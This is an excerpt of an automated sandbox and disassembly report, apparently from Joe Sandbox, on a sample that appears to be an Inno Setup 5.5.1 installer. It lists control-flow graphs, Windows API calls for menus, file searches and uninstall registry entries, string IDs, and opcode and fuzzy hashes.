                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50d408d7c884e6e1e9eef83812aacce54c36a632f8e4c3c09f50c6ce0f1de6a1
                                                    • Instruction ID: 2c29f6787255d97ab3f4589ac6aadd45d54e60a31d0a4dda1db310adca3c7782
                                                    • Opcode Fuzzy Hash: 50d408d7c884e6e1e9eef83812aacce54c36a632f8e4c3c09f50c6ce0f1de6a1
                                                    • Instruction Fuzzy Hash: 60E18031700124DFD710DF69E989A6E77F4EB54305FA580AAE4059B3A2C73CEE91EB09

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2185 4671cc-4671e2 2186 4671e4-4671e7 call 402d30 2185->2186 2187 4671ec-4672a3 call 494c88 call 402b30 * 6 2185->2187 2186->2187 2204 4672a5-4672cc call 414634 2187->2204 2205 4672e0-4672f9 2187->2205 2209 4672d1-4672db call 4145f4 2204->2209 2210 4672ce 2204->2210 2211 467336-467344 call 494f90 2205->2211 2212 4672fb-467322 call 414614 2205->2212 2209->2205 2210->2209 2220 467346-467355 call 494dd8 2211->2220 2221 467357-467359 call 494efc 2211->2221 2218 467327-467331 call 4145d4 2212->2218 2219 467324 2212->2219 2218->2211 2219->2218 2226 46735e-4673b1 call 4948ec call 41a3c8 * 2 2220->2226 2221->2226 2233 4673c2-4673d7 call 45142c call 414b10 2226->2233 2234 4673b3-4673c0 call 414b10 2226->2234 2240 4673dc-4673e3 2233->2240 2234->2240 2241 4673e5-467426 call 4146b4 call 4146f8 call 420f90 call 420fbc call 420b60 call 420b8c 2240->2241 2242 46742b-4678b1 call 494d28 call 49504c call 414614 * 3 call 4146b4 call 4145d4 * 3 call 460a24 call 460a3c call 460a48 call 460a90 call 460a24 call 460a3c call 460a48 call 460a90 call 460a3c call 460a90 LoadBitmapA call 41d6a8 call 460a60 call 460a78 call 466fa8 call 468abc call 466628 call 40357c call 414b10 call 466960 call 466968 call 466628 call 40357c * 2 call 414b10 call 468abc call 466628 call 414b10 call 466960 call 466968 call 414b10 * 2 call 468abc call 414b10 * 2 call 466960 call 4145f4 call 466960 call 4145f4 call 468abc call 414b10 call 466960 call 466968 call 468abc call 414b10 call 466960 call 4145f4 * 2 call 414b10 call 466960 call 4145f4 2240->2242 2241->2242 2372 4678b3-46790b call 4145f4 call 414b10 call 466960 call 4145f4 2242->2372 2373 46790d-467926 call 414a3c * 2 2242->2373 2380 46792b-4679dc call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2372->2380 2373->2380 2399 467a16-467c4c call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 4181d8 call 42ed30 call 414b10 call 494d28 call 49504c call 414614 call 466628 call 414b10 call 466960 call 4145f4 call 466628 call 468abc call 466628 call 414b10 call 466960 call 4145f4 call 466968 call 466628 call 414b10 call 466960 2380->2399 2400 4679de-4679f9 2380->2400 2461 467c4e-467c57 2399->2461 2462 467c8d-467d46 call 466628 call 468abc call 466628 call 414b10 call 49504c call 466960 2399->2462 2401 4679fe-467a11 call 4145f4 2400->2401 2402 4679fb 2400->2402 2401->2399 2402->2401 2461->2462 2463 467c59-467c88 call 414a3c call 466968 2461->2463 2480 467d80-4681a1 call 466628 call 414b10 call 49505c * 2 call 42e8b8 call 4145f4 call 466960 call 4145f4 call 414b10 call 494d28 call 49504c call 414614 call 414b10 call 466628 call 468abc call 466628 call 414b10 call 466960 call 466968 call 42bbc8 call 49505c call 44e8a8 call 466628 call 468abc call 466628 call 468abc call 466628 call 468abc * 2 call 414b10 call 466960 call 466968 call 468abc call 4948ec call 41a3c8 call 466628 call 40357c call 414b10 call 466960 call 4145f4 call 414b10 * 2 call 49505c call 403494 call 40357c * 2 call 414b10 2462->2480 2481 467d48-467d63 2462->2481 2463->2462 2580 4681c5-4681cc 2480->2580 2581 4681a3-4681c0 call 44ffb0 call 45010c 2480->2581 2482 467d65 2481->2482 2483 467d68-467d7b call 4145f4 2481->2483 2482->2483 2483->2480 2583 4681f0-4681f7 2580->2583 2584 4681ce-4681eb call 44ffb0 call 45010c 2580->2584 2581->2580 2586 46821b-468261 call 4181d8 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468bb0 2583->2586 2587 4681f9-468216 call 44ffb0 call 45010c 2583->2587 2584->2583 2601 468263-46826a 2586->2601 2602 46827b 2586->2602 2587->2586 2603 468277-468279 2601->2603 2604 46826c-468275 2601->2604 2605 46827d-46828c 2602->2605 2603->2605 2604->2602 2604->2603 2606 4682a6 2605->2606 2607 46828e-468295 2605->2607 2610 4682a8-4682c2 2606->2610 2608 468297-4682a0 2607->2608 2609 4682a2-4682a4 2607->2609 2608->2606 2608->2609 2609->2610 2611 46836b-468372 2610->2611 2612 4682c8-4682d1 2610->2612 2615 468405-468413 call 414b10 2611->2615 2616 468378-46839b call 47bb50 call 403450 2611->2616 2613 4682d3-46832a call 47bb50 call 414b10 call 47bb50 call 414b10 call 47bb50 call 414b10 2612->2613 2614 46832c-468366 call 414b10 * 3 2612->2614 2613->2611 2614->2611 2622 468418-468421 2615->2622 2635 4683ac-4683c0 call 403494 2616->2635 2636 46839d-4683aa call 47bcf0 2616->2636 2626 468427-46843f call 429fd0 2622->2626 2627 468531-468560 call 42b964 call 44e834 2622->2627 2644 4684b6-4684ba 2626->2644 2645 468441-468445 2626->2645 2661 468566-46856a 2627->2661 2662 46860e-468612 2627->2662 2657 4683d2-468403 call 42c7fc call 42cbb8 call 403494 call 414b10 2635->2657 2658 4683c2-4683cd call 403494 2635->2658 2636->2657 2650 4684bc-4684c5 2644->2650 2651 46850a-46850e 2644->2651 2652 468447-468481 call 40b434 call 47bb50 2645->2652 2650->2651 2659 4684c7-4684d2 2650->2659 2655 468522-46852c call 42a054 2651->2655 2656 468510-468520 call 42a054 2651->2656 2712 468483-46848a 2652->2712 2713 4684b0-4684b4 2652->2713 2655->2627 2656->2627 2657->2622 2658->2657 2659->2651 2671 4684d4-4684d8 2659->2671 2663 46856c-46857e call 40b434 2661->2663 2664 468614-46861b 2662->2664 2665 468691-468695 2662->2665 2691 4685b0-4685e7 call 47bb50 call 44cb04 2663->2691 2692 468580-4685ae call 47bb50 call 44cbd4 2663->2692 2664->2665 2674 46861d-468624 2664->2674 2675 468697-4686ae call 40b434 2665->2675 2676 4686fe-468707 2665->2676 2680 4684da-4684fd call 40b434 call 406ab4 2671->2680 2674->2665 2685 468626-468631 2674->2685 2706 4686b0-4686ec call 40b434 call 469824 * 2 call 4696c4 2675->2706 2707 4686ee-4686fc call 469824 2675->2707 2683 468726-46873b call 466d08 call 466a84 2676->2683 2684 468709-468721 call 40b434 call 469824 2676->2684 2723 468504-468508 2680->2723 2724 4684ff-468502 2680->2724 2737 46878d-468797 call 414a3c 2683->2737 2738 46873d-468760 call 42a038 call 40b434 2683->2738 2684->2683 2685->2683 2694 468637-46863b 2685->2694 2739 4685ec-4685f0 2691->2739 2692->2739 2705 46863d-468653 call 40b434 2694->2705 2734 468686-46868a 2705->2734 2735 468655-468681 call 42a054 call 469824 call 4696c4 2705->2735 2706->2683 2707->2683 2712->2713 2725 46848c-46849e call 406ab4 2712->2725 2713->2644 2713->2652 2723->2651 2723->2680 2724->2651 2725->2713 2748 4684a0-4684aa 2725->2748 2734->2705 2740 46868c 2734->2740 2735->2683 2749 46879c-4687bb call 414a3c 2737->2749 2763 468762-468769 2738->2763 2764 46876b-46877a call 414a3c 2738->2764 2746 4685f2-4685f9 2739->2746 2747 4685fb-4685fd 2739->2747 2740->2683 2746->2747 2753 468604-468608 2746->2753 2747->2753 2748->2713 2754 4684ac 2748->2754 2765 4687e5-468808 call 47bb50 call 403450 2749->2765 2766 4687bd-4687e0 call 42a038 call 469984 2749->2766 2753->2662 2753->2663 2754->2713 2763->2764 2769 46877c-46878b call 414a3c 2763->2769 2764->2749 2782 468824-46882d 2765->2782 2783 46880a-468813 2765->2783 2766->2765 2769->2749 2785 468843-468853 call 403494 2782->2785 2786 46882f-468841 call 403684 2782->2786 2783->2782 2784 468815-468822 call 47bcf0 2783->2784 2793 468865-46887c call 414b10 2784->2793 2785->2793 2786->2785 2794 468855-468860 call 403494 2786->2794 2798 4688b2-4688bc call 414a3c 2793->2798 2799 46887e-468885 2793->2799 2794->2793 2805 4688c1-4688e6 call 403400 * 3 2798->2805 2800 468887-468890 2799->2800 2801 468892-46889c call 42b0dc 2799->2801 2800->2801 2803 4688a1-4688b0 call 414a3c 2800->2803 2801->2803 2803->2805
                                                    APIs
                                                      • Part of subcall function 00494DD8: GetWindowRect.USER32(00000000), ref: 00494DEE
                                                    • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 0046759B
                                                      • Part of subcall function 0041D6A8: GetObjectA.GDI32(?,00000018,004675B5), ref: 0041D6D3
                                                      • Part of subcall function 00466FA8: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                      • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                      • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                      • Part of subcall function 00466968: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                      • Part of subcall function 0049505C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495066
                                                      • Part of subcall function 0042ED30: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                      • Part of subcall function 0042ED30: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                      • Part of subcall function 00494D28: 73A1A570.USER32(00000000,?,?,?), ref: 00494D4A
                                                      • Part of subcall function 00494D28: SelectObject.GDI32(?,00000000), ref: 00494D70
                                                      • Part of subcall function 00494D28: 73A1A480.USER32(00000000,?,00494DCE,00494DC7,?,00000000,?,?,?), ref: 00494DC1
                                                      • Part of subcall function 0049504C: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495056
                                                    • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021AFAF0,021B1850,?,?,021B1880,?,?,021B18D0,?), ref: 00468225
                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00468236
                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0046824E
                                                      • Part of subcall function 0042A054: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A06A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                    • String ID: $(Default)$STOPIMAGE
                                                    • API String ID: 3271511185-770201673
                                                    • Opcode ID: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                    • Instruction ID: b2f63b4b9f8df581d735fd8ef5c85857eef1c350e3dafc85bc3b179d47d789c4
                                                    • Opcode Fuzzy Hash: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                    • Instruction Fuzzy Hash: FCF2D6387005148FCB00EB69D9D5F9973F1BF49304F1582BAE9049B36ADB74AC46CB9A
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474DC9
                                                    • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EA6
                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EB4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID: unins$unins???.*
                                                    • API String ID: 3541575487-1009660736
                                                    • Opcode ID: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                    • Instruction ID: 3bd68598c0aa53c456c144f1316f7d147ab415eaa7c6a73ce12ee5554087e81d
                                                    • Opcode Fuzzy Hash: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                    • Instruction Fuzzy Hash: 99316370600118AFCB10EF65C881AEEB7A9EF85314F5084F6E50CA73A2DB389F418F19
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A71
                                                    • GetLastError.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A79
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileFindFirstLast
                                                    • String ID:
                                                    • API String ID: 873889042-0
                                                    • Opcode ID: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                    • Instruction ID: 4713bb530a1d6cf0c1be7e5c5fdd45c253cc675fccbb574d3c3c9d841926f9e3
                                                    • Opcode Fuzzy Hash: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                    • Instruction Fuzzy Hash: 44F0F971A04704AB8B21DFA69D4149EB7ACEB86725B5046BBFC14E3282DAB84E054558
                                                    APIs
                                                    • GetVersion.KERNEL32(000003FD,0046DF9A), ref: 0046DF0E
                                                    • CoCreateInstance.OLE32(00499B84,00000000,00000001,00499B94,?,000003FD,0046DF9A), ref: 0046DF2A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateInstanceVersion
                                                    • String ID:
                                                    • API String ID: 1462612201-0
                                                    • Opcode ID: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                    • Instruction ID: 830c4b43a8f201c084d489d1d0538b8be171f1220f730b3634288a605713aaeb
                                                    • Opcode Fuzzy Hash: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                    • Instruction Fuzzy Hash: 08F0A031B853009EEB14E7A9DC46B4A37C0BB65328F4000BBF044972D2E3AC8890875F
                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                    • Instruction ID: c2e77f62f7768c8d819fe5e4f890f04d0c30465c7a0250885ae4f210fddfc08b
                                                    • Opcode Fuzzy Hash: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                    • Instruction Fuzzy Hash: 9BE0927170021466D311A96A9C86AEAB35C975C314F00427FBA84E73C2EDB89E4146A9
                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424149,?,00000000,00424154), ref: 00423BA6
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                    • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                    • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                    • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                    • Instruction ID: 76bfcf8d2b29e22e6d76dcded3dafddf5190573ba102c834aba1eed314c6e9aa
                                                    • Opcode Fuzzy Hash: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                    • Instruction Fuzzy Hash: C9D0C27130460467C700AA68DC825AA358E8B84306F00483E3CC5DA2C3FABDDA485756
                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F534
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                    • Instruction ID: dfc14921be52f7ae21963fbc3fbcd64f7f6a072f88f97ccbdbccca1c2d2fc057
                                                    • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                    • Instruction Fuzzy Hash: 9FD09E7220011DBB9B00DE99E840C6B73ADAB88710BD09926F945C7642D634ED9197A5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 406 46ee78-46eeaa 407 46eec7 406->407 408 46eeac-46eeb3 406->408 411 46eece-46ef06 call 403634 call 403738 call 42deb8 407->411 409 46eeb5-46eebc 408->409 410 46eebe-46eec5 408->410 409->407 409->410 410->411 418 46ef21-46ef4a call 403738 call 42dddc 411->418 419 46ef08-46ef1c call 403738 call 42deb8 411->419 427 46ef4c-46ef55 call 46eb48 418->427 428 46ef5a-46ef83 call 46ec64 418->428 419->418 427->428 432 46ef95-46ef98 call 403400 428->432 433 46ef85-46ef93 call 403494 428->433 437 46ef9d-46efe8 call 46ec64 call 42c3f4 call 46ecac call 46ec64 432->437 433->437 446 46effe-46f01f call 455570 call 46ec64 437->446 447 46efea-46effd call 46ecd4 437->447 454 46f075-46f07c 446->454 455 46f021-46f074 call 46ec64 call 4313fc call 46ec64 call 4313fc call 46ec64 446->455 447->446 456 46f07e-46f0bb call 4313fc call 46ec64 call 4313fc call 46ec64 454->456 457 46f0bc-46f0c3 454->457 455->454 456->457 461 46f104-46f129 call 40b434 call 46ec64 457->461 462 46f0c5-46f103 call 46ec64 * 3 457->462 481 46f12b-46f136 call 47bb50 461->481 482 46f138-46f141 call 403494 461->482 462->461 492 46f146-46f151 call 478898 481->492 482->492 496 46f153-46f158 492->496 497 46f15a 492->497 498 46f15f-46f329 call 403778 call 46ec64 call 47bb50 call 46ecac call 403494 call 40357c * 2 call 46ec64 call 403494 call 40357c * 2 call 46ec64 call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 496->498 497->498 561 46f33f-46f34d call 46ecd4 498->561 562 46f32b-46f33d call 46ec64 498->562 566 46f352 561->566 567 46f353-46f39c call 46ecd4 call 46ed08 call 46ec64 call 47bb50 call 46ed6c 562->567 566->567 578 46f3c2-46f3cf 567->578 579 46f39e-46f3c1 call 46ecd4 * 2 567->579 581 46f3d5-46f3dc 578->581 582 46f49e-46f4a5 578->582 579->578 586 46f3de-46f3e5 581->586 587 46f449-46f458 581->587 583 46f4a7-46f4dd call 4941f8 582->583 584 46f4ff-46f515 RegCloseKey 582->584 583->584 586->587 591 46f3e7-46f40b call 430bc4 586->591 590 46f45b-46f468 587->590 594 46f47f-46f498 call 430c00 call 46ecd4 590->594 595 46f46a-46f477 590->595 591->590 601 46f40d-46f40e 591->601 604 46f49d 594->604 595->594 597 46f479-46f47d 595->597 597->582 597->594 603 46f410-46f436 call 40b434 call 4790c4 601->603 609 46f443-46f445 603->609 610 46f438-46f43e call 430bc4 603->610 604->582 609->603 612 46f447 609->612 610->609 612->590
                                                    APIs
                                                      • Part of subcall function 0046EC64: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                      • Part of subcall function 0046ECD4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                    • RegCloseKey.ADVAPI32(?,0046F51D,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F568,?,?,0049C1D0,00000000), ref: 0046F510
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Value$Close
                                                    • String ID: " /SILENT$5.5.1 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                    • API String ID: 3391052094-213252641
                                                    • Opcode ID: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                    • Instruction ID: b1500e3f1927c4d0668730226bdd95c12c24136f653289305a03eef3c2fa698f
                                                    • Opcode Fuzzy Hash: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
